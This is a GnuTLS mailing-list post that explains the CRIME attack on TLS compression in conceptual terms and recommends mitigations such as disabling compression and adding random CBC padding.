Hello, If you're not already aware there is a new attack on TLS called "crime". I was asked by the author of this attack not to disclose any information, but it seems it is public already [0] so I can comment on it. That attack takes advantage of compression and by forcing an HTTPS client to use carefully formatted data it may be able to guess the contents of other non-controlled by the attacker data, based on the compressed size. Because there is no formal description of the attack, nor a precise use-case where the attack is considered dangerous, and due to that there may be overreactions. The attack works when you have compression enabled and data from an adversary can be mixed with sensitive data (e.g. a URL that is provided by an adversary is mixed with secret cookie data in an HTTPS request). Moreover the adversary must be able to invoke multiple trials (e.g. force a user to visit specially crafted URLs again and again - perhaps by using javascript).
So currently the threat is mostly on the HTTPS protocol and especially browsers. To sum up. * Who does this attack affect: 1. clients or servers that use compression and provide the ability to an adversary to inject data (multiple times) in their session. * How to mitigate the attack? 1. Do not enable compression (gnutls' doesn't enable it by default) 2. When using compression use the CBC ciphers that include a random padding up to 255 bytes. That would increase the number of trials an attacker needs to perform significantly. 3. Make sure that even if you must mix adversary-controlled data with sensitive data, that the adversary cannot trigger that multiple times. I'll add a recommendation on the web site later today. regards, Nikos [0]. http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/ _______________________________________________ Help-gnutls mailing list [email protected] https://lists.gnu.org/mailman/listinfo/help-gnutls
